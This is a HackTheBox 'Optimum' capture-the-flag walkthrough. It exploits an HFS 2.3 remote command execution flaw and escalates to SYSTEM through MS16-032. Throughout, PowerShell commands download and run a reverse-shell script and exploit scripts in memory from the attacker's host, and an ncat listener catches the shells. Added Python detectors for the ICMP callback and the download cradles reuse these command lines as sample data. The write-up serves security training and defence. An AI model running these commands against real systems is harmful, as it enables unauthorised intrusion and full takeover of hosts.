
HTB - Optimum

Optimum is a vulnerable virtual machine created by ch4p on HackTheBox. This post documents a complete walkthrough of pwning the machine, from enumeration to a SYSTEM shell.

Enumeration

Nmap

Starting with an nmap scan, we discover that the target is a Windows machine with a single open port: HttpFileServer (HFS) httpd 2.3 on port 80.

$ nmap -sC -sV -oA recon/default 10.10.10.8

Nmap scan report for 10.10.10.8
Host is up (0.091s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

Searching Exploit-DB for this service with searchsploit gives several exact matches for version 2.3; we use the Python one, 49125.py.

$ searchsploit httpfileserver

...

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3)    ...      | windows/webapps/49125.py

A ping command back to our attack box is a simple way to test whether the exploit gives us command execution.

$ python 49125.py 10.10.10.8 80 "ping.exe -n 1 10.10.14.18"

We run tcpdump on the VPN interface (tun0) to see whether the target pings us.

$ sudo tcpdump -i tun0 icmp

...
06:13:37.143895 IP 10.10.10.8 > 10.10.14.18: ICMP echo request, id 1, seq 25, length 40
...
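The defender's view of this test, as an added example that is not part of the original post: a small Python detector over constructed tcpdump lines (the first mirrors the packet captured above) that flags a monitored web server sending ICMP echo requests outside its own network, which is exactly the signal the ping test produces. The server address and the internal range are assumptions taken from this box.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed sample of tcpdump output in the format shown above; the
# first line mirrors the echo request the target sent back to us.
SAMPLE_TCPDUMP = """\
06:13:37.143895 IP 10.10.10.8 > 10.10.14.18: ICMP echo request, id 1, seq 25, length 40
06:13:37.144120 IP 10.10.14.18 > 10.10.10.8: ICMP echo reply, id 1, seq 25, length 40
06:14:02.001233 IP 10.10.10.8 > 10.10.10.2: ICMP echo request, id 1, seq 1, length 40
06:15:11.557310 IP 10.10.14.18 > 10.10.10.8: ICMP echo request, id 7, seq 1, length 64
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+) > (?P<dst>[\d.]+): "
    r"ICMP echo (?P<kind>request|reply), id (?P<id>\d+), seq (?P<seq>\d+)"
)

@dataclass(frozen=True)
class Alert:
    ts: str
    src: str
    dst: str
    seq: int

def find_icmp_callbacks(text, servers, internal_nets):
    """Flag ICMP echo *requests* that a monitored server sends to an
    address outside the internal ranges. A web server has no business
    pinging arbitrary external hosts; on this box the first such packet
    was the proof of command execution. Replies and pings that stay
    inside the internal ranges are ignored to keep the signal clean."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["kind"] != "request" or m["src"] not in servers:
            continue
        dst = ipaddress.ip_address(m["dst"])
        if any(dst in n for n in nets):
            continue
        alerts.append(Alert(m["ts"], m["src"], m["dst"], int(m["seq"])))
    return alerts

if __name__ == "__main__":
    for a in find_icmp_callbacks(SAMPLE_TCPDUMP, {"10.10.10.8"}, ["10.10.10.0/24"]):
        print(f"{a.ts} {a.src} -> {a.dst} seq={a.seq}: outbound ICMP from web server")
```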

The echo request from 10.10.10.8 confirms that we have command execution on the target. Next, we try to get a reverse shell. To do this, we serve a copy of Invoke-PowerShellTcp.ps1 from nishang, renamed rev.ps1, from a Python HTTP server on our Kali box, and use the following command to download and execute it in memory on the target.

$ python 49125.py 10.10.10.8 80 "powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/rev.ps1')"

With an ncat listener waiting on port 4444, the reverse shell comes back as expected.

$ rlwrap ncat -nlvp 4444

...

PS C:\Users\kostas\Desktop> whoami
whoami
optimum\kostas

Privilege Escalation

Using the same approach, we execute sherlock.ps1 from PowerShell Empire on the target to check for missing patches. The script reports two vulnerabilities with public exploits.

PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/sherlock.ps1')

...

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

We try MS16-032 first. The exploit script for it can also be found in PowerShell Empire. We append the following line to the end of the script so that a reverse shell is spawned when the exploit succeeds.

Invoke-MS16-032 -Cmd "iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/rev.ps1')"

After copying the script into our HTTP server directory as ms16032.ps1, we execute it on the target.

PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/ms16032.ps1')
         __ __ ___ ___   ___     ___ ___ ___
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|

                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handles..
[!] No valid thread handles were captured, exiting!

Unfortunately, the first attempt fails. The following commands show why: the operating system is 64-bit but our PowerShell process is 32-bit, and the exploit does not work from a 32-bit process.

PS C:\Users\kostas\Desktop> [Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop> [Environment]::Is64BitProcess
False 

So we redo the reverse shell, this time launching the 64-bit PowerShell binary through the Sysnative path. Sysnative is the alias through which a 32-bit process reaches the real 64-bit System32 directory; a plain System32 path would be redirected by WOW64 to the 32-bit binaries in SysWOW64.

$ python 49125.py 10.10.10.8 80 "C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/rev.ps1')"

...

PS C:\Users\kostas\Desktop> [Environment]::Is64BitProcess
True
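From the detection side, both reverse-shell commands used in this walkthrough (the first one in the Exploitation section and the Sysnative one above) share a recognisable shape: an in-memory download cradle launched by the web server process. The following added Python example, not part of the original post, classifies constructed process-creation records built from the commands used here; the hfs.exe parent image name and the record layout are assumptions.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records (parent image, child image, command
# line) modelled on the commands in this walkthrough. Not real event logs;
# "hfs.exe" as the HFS image name is an assumption.
SAMPLE_EVENTS = [
    ("hfs.exe", r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "powershell.exe iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/rev.ps1')"),
    ("hfs.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\WINDOWS\Sysnative\WindowsPowerShell\v1.0\powershell.exe iex(new-object net.webclient)"
     ".downloadstring('http://10.10.14.18:8000/rev.ps1')"),
    ("hfs.exe", r"C:\Windows\SysWOW64\cmd.exe", "cmd.exe /c ping.exe -n 1 10.10.14.18"),
    ("explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell.exe -File C:\scripts\backup.ps1"),
]

# The "download cradle" seen on this box: script text fetched over HTTP and
# executed in memory, so no file is ever written to disk.
CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b.*downloadstring\s*\(", re.I)
SYSNATIVE_RE = re.compile(r"\\sysnative\\", re.I)
WEB_SERVER_PARENTS = {"hfs.exe"}          # whatever serves HTTP on the host
SHELL_IMAGES = ("powershell.exe", "cmd.exe")

@dataclass(frozen=True)
class Finding:
    image: str
    reasons: tuple

def classify(parent, image, cmdline):
    """Return the reasons a record is suspicious, or () if it looks benign."""
    reasons = []
    if CRADLE_RE.search(cmdline):
        reasons.append("in-memory download cradle")
    if SYSNATIVE_RE.search(cmdline):
        reasons.append("Sysnative path: 32-bit parent deliberately launching a 64-bit child")
    if parent.lower() in WEB_SERVER_PARENTS and image.lower().endswith(SHELL_IMAGES):
        reasons.append(f"shell spawned by web server process {parent}")
    return tuple(reasons)

def scan(events):
    findings = []
    for parent, image, cmdline in events:
        reasons = classify(parent, image, cmdline)
        if reasons:
            findings.append(Finding(image, reasons))
    return findings
```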

We try the MS16-032 exploit again in the 64-bit session. This time it is successful.

PS C:\Users\kostas\Desktop> iex(new-object net.webclient).downloadstring('http://10.10.14.18:8000/ms16032.ps1')
         __ __ ___ ___   ___     ___ ___ ___
        |  V  |  _|_  | |  _|___|   |_  |_  |
        |     |_  |_| |_| . |___| | |_  |  _|
        |_|_|_|___|_____|___|   |___|___|___|

                       [by b33f -> @FuzzySec]

[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handles..
[?] Done, got 4 thread handle(s)!

[?] Thread handle list:
2832
2500
2952
2560

[*] Sniffing out privileged impersonation token..

[?] Trying thread handle: 2832
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[?] Success, open SYSTEM token handle: 3596
[+] Resuming thread..

[*] Sniffing out SYSTEM shell..

[>] Duplicating SYSTEM token
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!

Checking our ncat listener, we get a reverse shell running as NT AUTHORITY\SYSTEM.

$ rlwrap ncat -nlvp 4444

...

PS C:\Users\kostas\Desktop> whoami
whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.